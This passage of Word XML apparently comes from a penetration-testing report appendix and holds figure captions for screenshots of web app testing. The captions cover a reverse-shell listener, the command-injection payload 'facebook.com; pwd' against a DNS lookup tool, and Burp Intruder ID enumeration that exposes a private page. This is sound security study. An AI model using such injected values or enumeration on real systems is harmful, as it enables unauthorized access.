      </w:r>
    </w:p>
    <w:p w14:paraId="2C08418D" w14:textId="25FB7095" w:rsidR="007A78B0" w:rsidRPr="00D77DFE" w:rsidRDefault="007A78B0" w:rsidP="009E5B3F">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="paragraph70" w:history="1">
        <w:r w:rsidRPr="00D77DFE">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:t>Figure A.51</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> : Setting up a Listener to Gain a Reverse Shell</w:t>
      </w:r>
      <w:r w:rsidR="00883F52">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32BAD7E9" w14:textId="77777777" w:rsidR="00D815B8" w:rsidRDefault="00D815B8" w:rsidP="009E5B3F">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:noProof/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C7A45AD" w14:textId="2A9F0CCD" w:rsidR="00020D71" w:rsidRPr="00D77DFE" w:rsidRDefault="00020D71"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46547A4" wp14:editId="54F81203">
            <wp:extent cx="4080115" cy="1613997"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:docPr id="7666528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11">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect r="11954"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4091039" cy="1618318"/>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93" w:name="resource71"/>
    <w:p w14:paraId="27994B74" w14:textId="6A508FD8" w:rsidR="007A78B0" w:rsidRPr="00D77DFE" w:rsidRDefault="007A78B0"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"paragraph71"</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A.52</w:t>
      </w:r>
      <w:bookmarkEnd w:id="293"/>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DNS Lookup Tool Tested </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>By</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Payload “facebook.com; pwd”</w:t>
      </w:r>
      <w:r w:rsidR="00150163">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73DC9D6B" w14:textId="77777777" w:rsidR="007A78B0" w:rsidRPr="00D77DFE" w:rsidRDefault="007A78B0" w:rsidP="00020D71">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F251B7F" w14:textId="47D2B711" w:rsidR="00736606" w:rsidRPr="00D77DFE" w:rsidRDefault="00736606" w:rsidP="00736606">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161BAF69" wp14:editId="7CF90568">
            <wp:extent cx="4244454" cy="3020985"/>
            <wp:effectExtent l="0" t="0" r="3810" b="8255"/>
            <wp:docPr id="4911250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4252248" cy="3026533"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="294" w:name="resource72"/>
    <w:p w14:paraId="7009BC7B" w14:textId="2FAB4875" w:rsidR="007A78B0" w:rsidRPr="00D77DFE" w:rsidRDefault="007A78B0"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"paragraph72"</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A.53</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xml:space="preserve">: </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ASCII  Art</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Gallery Testing Working Entities</w:t>
      </w:r>
      <w:r w:rsidR="00150163">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="294"/>
    <w:p w14:paraId="276E9A3D" w14:textId="77777777" w:rsidR="007A78B0" w:rsidRPr="00D77DFE" w:rsidRDefault="007A78B0" w:rsidP="00736606">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57668BBD" w14:textId="77777777" w:rsidR="00020D71" w:rsidRPr="00D77DFE" w:rsidRDefault="00020D71" w:rsidP="00020D71">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28BB201C" w14:textId="163C02C6" w:rsidR="00736606" w:rsidRPr="00D77DFE" w:rsidRDefault="0073660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2C17D109" wp14:editId="0FD6A9DC">
            <wp:extent cx="4380931" cy="1503932"/>
            <wp:effectExtent l="0" t="0" r="635" b="1270"/>
            <wp:docPr id="8457208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440031" cy="1524220"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="295" w:name="resource73"/>
    <w:p w14:paraId="7366E4EE" w14:textId="59078087" w:rsidR="007A78B0" w:rsidRPr="00D77DFE" w:rsidRDefault="007A78B0" w:rsidP="001B7354">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"paragraph73"</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A.54</w:t>
      </w:r>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7 and Higher Numbers Are Not Found</w:t>
      </w:r>
      <w:bookmarkEnd w:id="295"/>
      <w:r w:rsidR="00150163">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B4A3C9" w14:textId="3DA49908" w:rsidR="00736606" w:rsidRPr="00D77DFE" w:rsidRDefault="00736606" w:rsidP="007A78B0">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63C41DB5" wp14:editId="3A8ECEA4">
            <wp:extent cx="4257973" cy="1751162"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="46502942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271204" cy="1756603"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="296" w:name="resource74"/>
    <w:p w14:paraId="560C9CD7" w14:textId="0FDA9496" w:rsidR="007A78B0" w:rsidRPr="00D77DFE" w:rsidRDefault="007A78B0" w:rsidP="009E5B3F">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:instrText>HYPERLINK  \l "paragraph74"</w:instrText>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t>Figure A.55</w:t>
      </w:r>
      <w:bookmarkEnd w:id="296"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">: Using Burp Suite Intruder Tested the Values From 1-100 to See </w:t>
      </w:r>
      <w:r w:rsidR="00512AA9" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00512AA9">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t>orking One</w:t>
      </w:r>
      <w:r w:rsidR="00150163">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74252F78" w14:textId="77777777" w:rsidR="001B7354" w:rsidRDefault="001B7354" w:rsidP="009E5B3F">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:noProof/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70E32459" w14:textId="12377236" w:rsidR="00736606" w:rsidRPr="00D77DFE" w:rsidRDefault="0073660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778D07C" wp14:editId="76B28B16">
            <wp:extent cx="4140679" cy="1432904"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="127223210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r="15005"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4150873" cy="1436432"/>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97" w:name="resource75"/>
    <w:p w14:paraId="516ADD68" w14:textId="4F82F44A" w:rsidR="007A78B0" w:rsidRPr="00D77DFE" w:rsidRDefault="007A78B0" w:rsidP="009E5B3F">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:instrText>HYPERLINK  \l "paragraph75"</w:instrText>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t>Figure A.56</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t>: Sorted Results by Length, The Number 74 Has Different Length Among Others</w:t>
      </w:r>
      <w:r w:rsidR="00150163">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="297"/>
    <w:p w14:paraId="5D5DE069" w14:textId="77777777" w:rsidR="007A78B0" w:rsidRPr="00D77DFE" w:rsidRDefault="007A78B0" w:rsidP="00736606">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="069D79E7" w14:textId="502C418C" w:rsidR="00736606" w:rsidRPr="00D77DFE" w:rsidRDefault="00736606"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529A5AE2" wp14:editId="4E06D9F9">
            <wp:extent cx="3292670" cy="3536830"/>
            <wp:effectExtent l="0" t="0" r="3175" b="6985"/>
            <wp:docPr id="19102942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298294" cy="3542871"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="298" w:name="resource76"/>
    <w:p w14:paraId="795E4182" w14:textId="6DE2A4C1" w:rsidR="007A78B0" w:rsidRPr="00D77DFE" w:rsidRDefault="007A78B0" w:rsidP="009E5B3F">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:instrText>HYPERLINK  \l "paragraph76"</w:instrText>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t>Figure A.57</w:t>
      </w:r>
      <w:bookmarkEnd w:id="298"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t>: Testing ID 74 and Found Private Page</w:t>
      </w:r>
      <w:r w:rsidR="00150163">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FA07900" w14:textId="77777777" w:rsidR="007A78B0" w:rsidRPr="00D77DFE" w:rsidRDefault="007A78B0" w:rsidP="00736606">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28C6ACB5" w14:textId="77777777" w:rsidR="001B7354" w:rsidRDefault="001B7354" w:rsidP="00736606">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:noProof/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33C2FC40" w14:textId="13F49361" w:rsidR="00736606" w:rsidRPr="00D77DFE" w:rsidRDefault="00736606" w:rsidP="00736606">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6C05C0D1" wp14:editId="7011D202">
            <wp:extent cx="4502989" cy="2399665"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="63317501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rotWithShape="1">
                    <a:blip r:embed="rId116" cstate="print">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect r="16602"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4502989" cy="239966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299" w:name="resource77"/>
    <w:p w14:paraId="6464E840" w14:textId="2AD77334"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"paragraph77"</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A.58</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 URL Fetcher tool Testing Showing the Source Code</w:t>
      </w:r>
      <w:r w:rsidR="00150163">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="299"/>
    <w:p w14:paraId="6FE50F14" w14:textId="77777777" w:rsidR="007A78B0" w:rsidRPr="00D77DFE" w:rsidRDefault="007A78B0" w:rsidP="00736606">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C238C61" w14:textId="77777777" w:rsidR="001B7354" w:rsidRDefault="001B7354" w:rsidP="00736606">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:noProof/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A605E6B" w14:textId="618FFE81" w:rsidR="00736606" w:rsidRPr="00D77DFE" w:rsidRDefault="00736606" w:rsidP="00512AA9">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28727788" wp14:editId="6A33D56F">
            <wp:extent cx="3510951" cy="1948180"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="193034738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rotWithShape="1">
                    <a:blip r:embed="rId117">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect r="34975"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3510951" cy="1948180"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D1AE0A" w14:textId="2A49068E" w:rsidR="001B7354" w:rsidRDefault="00512AA9" w:rsidP="00512AA9">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:noProof/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:noProof/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F76DC2C" w14:textId="589FE2EE" w:rsidR="00736606" w:rsidRPr="00D77DFE" w:rsidRDefault="00736606" w:rsidP="00512AA9">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5BB30FED" wp14:editId="200AC7CE">
            <wp:extent cx="4123427" cy="1890395"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="111876060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rotWithShape="1">
                    <a:blip r:embed="rId118">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect r="23632"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4123427" cy="189039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00" w:name="resource78"/>
    <w:bookmarkStart w:id="301" w:name="resource79"/>
